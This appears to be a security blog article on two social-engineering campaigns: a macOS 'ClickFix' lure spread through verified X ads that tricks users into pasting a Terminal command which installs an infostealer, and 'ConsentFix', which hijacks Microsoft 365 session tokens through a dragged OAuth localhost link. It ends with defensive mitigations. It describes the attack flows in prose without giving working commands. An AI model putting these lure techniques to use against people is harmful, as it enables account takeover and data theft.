Social Engineering Evolution: Analyzing the Rise of macOS ‘ClickFix’ Campaigns and ConsentFix OAuth Hijacking
The cybersecurity landscape is witnessing a sophisticated convergence of social engineering and technical exploitation. Two distinct yet equally alarming methodologies have emerged: a highly targeted macOS infection vector amplified through verified X (formerly Twitter) advertisements, and a novel browser-based hijacking technique known as “ConsentFix,” designed to exfiltrate Microsoft 365 session tokens without the deployment of traditional malware.
Security researchers from Jamf and Malwarebytes have documented a recent campaign on X where a verified, sponsored account promoted a fraudulent macOS utility called “DynamicLake.” This application was crafted as a “lookalike” to mimic legitimate Dynamic Island utilities, leveraging visual familiarity to build instant user trust.
The attack chain follows a precise sequence: the advertisement directs users to a deceptive clone domain—dynamicmacisland[.]com—which presents instructions to open the macOS Terminal and execute a specific command pasted from the clipboard. This single, seemingly innocuous action bypasses traditional signature-based antivirus detection by utilizing the user’s own administrative privileges to install an infostealer closely related to the Atomic Stealer family.
This campaign is particularly effective because it weaponizes three converging pillars of deception: ClickFix-style social engineering (manipulating users into running manual commands), visual brand impersonation (using lookalike domains), and platform authority (using paid, verified ad placements to bypass the user’s natural skepticism).
Historically, “ClickFix” tactics relied on fake “human verification” CAPTCHAs. This new iteration evolves the threat by targeting the macOS command line, which often evades endpoint protection because the malicious activity is explicitly authorized by the user via the Terminal.
While macOS users face this command-line threat, Windows and enterprise cloud users are being targeted by ConsentFix—a highly refined technique for Microsoft 365 account takeover that circumvents the need for password theft or traditional malware entirely. ConsentFix manipulates the browser and OAuth authorization flows to trick victims into inadvertently handing over active session tokens.
The attack typically begins with a lure hosted on a trusted service, such as Dropbox. To evade automated security scanners, these links are frequently password-protected. Once accessed, the user is presented with a convincing, yet fraudulent, Microsoft sign-in prompt.

Rather than asking for a password, the interface instructs the user to perform an action that seems technically plausible but is highly irregular: dragging a “localhost” callback link directly into the browser. Within seconds of this action, the attacker captures the session tokens, granting them immediate access to OneDrive, Teams, and other Microsoft 365 services. Because the attacker is using a legitimate, hijacked session, they can often bypass Multi-Factor Authentication (MFA) entirely.
ConsentFix is uniquely dangerous because it subverts the very foundation of modern security awareness training. Users are taught to guard their passwords and avoid suspicious downloads; they are rarely trained to recognize the dangers of manipulating browser URL bars or OAuth redirect flows. This technique has recently been observed circulating on Russian-language cybercrime forums, suggesting an impending increase in volume as it becomes accessible to lower-tier threat actors.
Defensive Strategies and Mitigation
Protecting against these multi-vector attacks requires a layered defense combining technical controls with behavioral intelligence:
- For macOS Endpoints: Organizations should implement strict monitoring for unusual clipboard-to-Terminal patterns. Enforcing application allowlists and tightening Kernel Extension/API controls can mitigate the impact of unauthorized command-line installations.
- For Cloud and SaaS Environments: Strengthen Conditional Access policies and enforce strict token lifetime constraints. Security Operations Centers (SOC) should prioritize monitoring for anomalous OAuth consent grants and unexpected token-issuance events.
- For the Human Element: Training must evolve. Employees should be taught that unexpected “verification” steps requiring browser manipulation (like drag-and-drop actions) are immediate red flags. Furthermore, any link hosted on third-party platforms that requires a password to view should be treated with extreme caution.
Ultimately, these incidents serve as a stark reminder: platform-provided signals—such as verification badges, paid placement status, and familiar login interfaces—are no longer reliable indicators of legitimacy. Vigilant link-level inspection and rapid reporting remain our most effective tools against these evolving social engineering tactics.